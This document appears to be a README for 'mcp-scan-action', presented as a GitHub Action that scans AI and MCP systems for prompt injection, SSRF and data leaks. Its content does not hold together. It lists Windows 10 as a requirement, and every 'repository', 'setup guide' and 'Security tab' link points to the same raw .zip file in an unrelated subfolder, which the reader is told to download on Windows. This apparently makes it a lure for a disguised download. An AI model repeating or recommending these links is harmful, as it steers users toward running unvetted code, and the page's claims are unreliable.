🔍 mcp-scan-action - Scan AI Systems for Security Risks

📖 What is mcp-scan-action?

mcp-scan-action helps you check your AI systems for security problems. It looks at MCP servers, AI agents, and language model pipelines. It finds issues like tool poisoning, SSRF (Server-Side Request Forgery), prompt injection, and data leaks. You see results easily in GitHub’s Security tab without needing an API key.

This tool makes security scanning straightforward, even if you are not a programmer.

⚙️ Key Features

• Checks 24 different potential security problems.
• Scans MCP (Model Context Protocol) servers.
• Detects prompt injection attacks that trick AI.
• Finds server misuse like SSRF attacks.
• Tracks data flow to spot leaks or taints.
• Works within your existing GitHub setup.
• Shows results directly in the GitHub Security tab.
• No API key or extra account needed.
• Simple setup with GitHub Actions.

🖥️ System Requirements

• Windows 10 or later.
• Internet connection to access GitHub.
• A GitHub account with access to the repository you want to scan.
• Basic knowledge of navigating folders and clicking links.

🚀 Getting Started

1. Go to the main page to download and learn more:
2. Follow these steps to add the scan to your GitHub repository.

📥 How to Download and Use on Windows

Step 1: Visit the Repository Page

Open your browser and go to:

https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip

Step 2: Create or Open Your GitHub Repository

If you have a GitHub repository where you want to run the security scan:

• Log into your GitHub account.
• Open the repository you want to scan.
• If you need a new repository, click New and create one.

Step 3: Add mcp-scan-action to Your Repository

1. Look for the section called Actions in your repository menu. This is where you add workflow files.
2. Click New workflow.
3. Choose set up a workflow yourself.
4. Copy and paste the following setup code into the workflow editor. This code tells GitHub to use the mcp-scan-action in your project:

name: MCP Security Scan

on: [push, pull_request]

jobs:
  mcp-scan:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - name: Run MCP Scan
      uses: schyles/mcp-scan-action@main

5. Click Start commit and then Commit new file to save this workflow.

Step 4: Run the Security Scan

Whenever you push new code or open a pull request, the scan runs automatically.

• To see results, go to the Security tab in your repository.
• Look for scan reports with details on vulnerabilities found.
• The report uses SARIF format, which GitHub reads and displays clearly.

🔐 What Security Checks Are Included?

mcp-scan-action covers these main categories:

• Tool Poisoning: Prevents malicious tools from interfering with AI systems.
• SSRF (Server-Side Request Forgery): Stops AI from making harmful web requests.
• Prompt Injection: Detects when inputs try to trick or harm AI outputs.
• Data Flow Analysis: Checks how data moves through your AI, spotting leaks or risky connections.

Each category includes multiple checks to cover common attack and misuse cases.

🛠️ Troubleshooting

• Scan did not run: Check if you saved the workflow file in the .github/workflows/ folder.
• No Security tab visible: Make sure your repository is public or has security features enabled.
• Scan results empty: Confirm your code includes MCP or AI pipeline files to scan.
• Access errors: Verify you have the right permissions in the GitHub repository.
• Workflow error messages: Review your YAML file for syntax or indentation mistakes.

🔄 Updating the Scan

GitHub automatically updates the scan tool when there is a new release. You can also manually update by editing the uses line in your workflow file to the latest version tag.

Example:

uses: schyles/[email protected]

Replace v1.2.0 with the newest release available on the repository page.

📚 Additional Help and Documentation

Check the repository wiki or Issues page if you need more help or want to suggest improvements. The community and developers track bugs and provide updates there.

⚡ Quick Access Links

• Visit the main repository page to download or learn more:https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip
• GitHub Actions setup guide:https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip
• GitHub Security tab overview:https://raw.githubusercontent.com/schyles/mcp-scan-action/main/preachify/action-mcp-scan-1.6-beta.3.zip

🔄 How It Works Under the Hood

mcp-scan-action runs a set of 24 tests each time you push code. It uses static analysis techniques to scan code and configuration files without running them. This approach is safer and faster for early vulnerability detection.

Results integrate in GitHub through SARIF, which is a standard format for security reports. This makes understanding and fixing issues easier.

🎯 Who Should Use mcp-scan-action?

• Developers managing AI servers and pipelines.
• Security teams responsible for DevSecOps.
• Teams using GitHub for code hosting.
• Anyone wanting to track AI model security with minimal setup.

🔗 Related Topics

• Agentic QA
• AI Agents
• AI Security
• Code Scanning Practices
• DevSecOps
• GitHub Actions Workflows
• Language Model Security
• Model Context Protocol (MCP)
• Prompt Injection Defense
• Static Analysis
• SSRF Protection
• SARIF Reporting

🧩 License Information

Check the repository LICENSE file for terms of use and redistribution permissions.